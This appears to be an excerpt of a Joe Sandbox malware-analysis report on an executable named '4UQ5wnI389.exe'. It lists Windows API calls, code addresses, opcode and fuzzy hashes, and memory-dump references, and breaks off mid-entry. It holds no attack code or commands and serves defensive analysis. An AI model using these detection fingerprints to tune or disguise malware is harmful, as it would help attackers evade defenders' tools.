                                                                                                            • Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                            • Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
                                                                                                            • Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                            • Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A
                                                                                                            APIs
                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                            • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                                            • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                            • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                                            APIs
                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseDeleteValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 2831762973-0
                                                                                                            • Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                            • Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
                                                                                                            • Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                            • Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
                                                                                                            APIs
                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$EnableShow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1136574915-0
                                                                                                            • Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                            • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                                                                                            • Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                            • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                              • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                              • Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 2547128583-0
                                                                                                            • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                            • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                            • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                            • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\4UQ5wnI389.exe,80000000,00000003), ref: 00405EE2
                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCreate
                                                                                                            • String ID:
                                                                                                            • API String ID: 415043291-0
                                                                                                            • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                            • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                            • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                            • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                                            • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1375471231-0
                                                                                                            • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                            • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                            • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                            • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                            APIs
                                                                                                            • EnumWindows.USER32(00000000), ref: 70142B6B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1972315766.0000000070141000.00000020.00000001.01000000.00000004.sdmp, Offset: 70140000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1972298784.0000000070140000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1972332397.0000000070144000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1972350477.0000000070146000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70140000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnumWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 1129996299-0
                                                                                                            • Opcode ID: 28a79c12e08d42398654c0a4f567b29b53a2c487832f190aa36e38849d9a62e5
                                                                                                            • Instruction ID: c12264d6cdcd0aeed1f10a988a6d9d21be059357f26e6825f088eebd9ea3953b
                                                                                                            • Opcode Fuzzy Hash: 28a79c12e08d42398654c0a4f567b29b53a2c487832f190aa36e38849d9a62e5
                                                                                                            • Instruction Fuzzy Hash: AA418F76800204EFDB21DF65DD92B5D3775EB16368FB058AAFC05C7A71D638A8C08BA1
                                                                                                            APIs
                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileMove
                                                                                                            • String ID:
                                                                                                            • API String ID: 3562171763-0
                                                                                                            • Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                            • Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
                                                                                                            • Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                            • Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                              • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointerwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 327478801-0
                                                                                                            • Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                            • Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
                                                                                                            • Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                            • Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E
                                                                                                            APIs
                                                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                            • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                                                                            • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                            • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                            • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                                                                            • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                            • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                                                                            APIs
                                                                                                            • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040E4D6,0040CED0,004033DE,0040CED0,0040E4D6,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3934441357-0
                                                                                                            • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                            • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                                            • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                            • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(7014505C,00000004,00000040,7014504C), ref: 701429B1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1972315766.0000000070141000.00000020.00000001.01000000.00000004.sdmp, Offset: 70140000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1972298784.0000000070140000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1972332397.0000000070144000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1972350477.0000000070146000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70140000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: 3ce031b4c506b67f5dc998f1a24a55ecb7f4b4a95de88548cec81246f7500f72
                                                                                                            • Instruction ID: 5ef512bb3c3dd94bd9f64ec8bacd3484ad7ed6beb0d3288e3aefaf30a05edb2f
                                                                                                            • Opcode Fuzzy Hash: 3ce031b4c506b67f5dc998f1a24a55ecb7f4b4a95de88548cec81246f7500f72
                                                                                                            • Instruction Fuzzy Hash: B3F092BA500284DEC360CF2A8C647093FE0B70B318B70466AF98CD7A72E3744444CB91
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Open
                                                                                                            • String ID:
                                                                                                            • API String ID: 71445658-0
                                                                                                            • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                            • Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
                                                                                                            • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                            • Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                            • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                            • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                            • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
